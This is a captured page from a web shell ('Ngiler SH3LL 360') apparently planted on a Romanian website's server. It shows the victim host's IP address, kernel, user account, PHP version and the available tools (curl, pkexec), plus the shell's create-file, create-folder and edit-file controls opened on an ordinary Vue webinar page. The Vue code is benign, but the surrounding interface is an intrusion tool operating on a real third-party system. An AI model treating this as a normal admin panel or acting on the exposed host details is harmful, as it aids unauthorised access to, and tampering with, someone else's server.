Ngiler SH3LL 360
Home
Information
Create File
Create Folder
:
/
home
/
tbf
/
newweb.tbf.ro
/
resources
/
js
/
views
/
Tbf
/
Information Server
MySQL :
OFF
Perl :
OFF
CURL :
ON
WGET :
OFF
PKEXEC :
OFF
Directive
Local Value
IP Address
89.40.16.97
System
Linux server.atelieruldeit.ro 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
User
tbf
PHP Version
7.3.33
Software
Apache
Doc root
Writable
close
Edit File :
PrezentareParteneri.vue
| Size :
3.13
KB
Copy
<template> <div class="white-wrapper" v-if="loaded"> <div class="container-section"> <div class="show-post without-left-side"> <div class="header"> <h1>Prezentare Webinar TBF pentru parteneri</h1> <div class="info"> <span><icon-timer />Marti, 21 Septembrie, Ora 19:00</span> <span><icon-author />Razvan Cazanescu</span> </div> </div> <div class="body"> <div class="right-side"> <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/595217514?title=0&byline=0&portrait=0&speed=0&badge=0&autopause=0&player_id=0&app_id=58479&h=78dd8bf795/embed" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen frameborder="0" style="position:absolute;top:0;left:0;width:100%;height:100%;"></iframe></div> </div> </div> </div> </div> <footer-tbf /> </div> </template> <script> /* eslint-disable no-useless-escape */ import FooterTbf from '../../components/Tbf/desktop/FooterTbfTwo' import IconTimer from '../../assets_homepage/Tbf/IconTimer' import IconAuthor from '../../assets_homepage/Tbf/IconAuthor' export default { data() { return { data_to_display: { meta_title: "Prezentare Webinar TBF pentru parteneri", meta_description: "Marti, 21 Septembrie, Ora 19:00", meta_image: "" }, loaded: false, share_link: '', contentPage: '' }; }, components: { IconTimer, IconAuthor, FooterTbf, }, async mounted() { window.scrollTo(0, 0); await this.getPageData() }, methods: { async getPageData() { this.loaded = true } }, metaInfo() { return { title: this.data_to_display.meta_title, titleTemplate: '%s « TBF', htmlAttrs: { lang: 'ro', amp: null }, meta: [ { name: 'description', content: this.data_to_display.meta_description }, { image: 'name', content: this.data_to_display.meta_title }, { image: 'description', content: this.data_to_display.meta_description }, { itemprop: 'image', content: process.env.MIX_VUE_APP_BASE_URL+"/build/images/share/Share - TBF.png" }, // GOOGLE { name: 'robots', content: 'follow' }, { name: 'author', content: 'TBF.ro' }, { name: 'copyright', content: '' }, // FACEBOOK { property: "og:title", content: this.data_to_display.meta_title }, { property: "og:type", content: 'article' }, { property: "og:description", content: this.data_to_display.meta_description }, { property: "og:url", content: process.env.MIX_VUE_APP_BASE_URL }, { property: "fb:app_id", content: process.env.MIX_FB_ID }, { property:"og:image", content: process.env.MIX_VUE_APP_BASE_URL+"/build/images/share/Share - TBF.png" }, // TWITTER { name: 'twitter:card', content: 'summary' }, { name: 'twitter:description', content: this.data_to_display.meta_description }, { name: 'twitter:title', content: this.data_to_display.meta_title }, { name: 'twitter:site', content: '@TBF' }, { name: 'twitter:creator', content: '@TBF' }, { name: 'twitter:image', content: process.env.MIX_VUE_APP_BASE_URL+"/build/images/share/Share - TBF.png" }, ], } }, } </script>
Back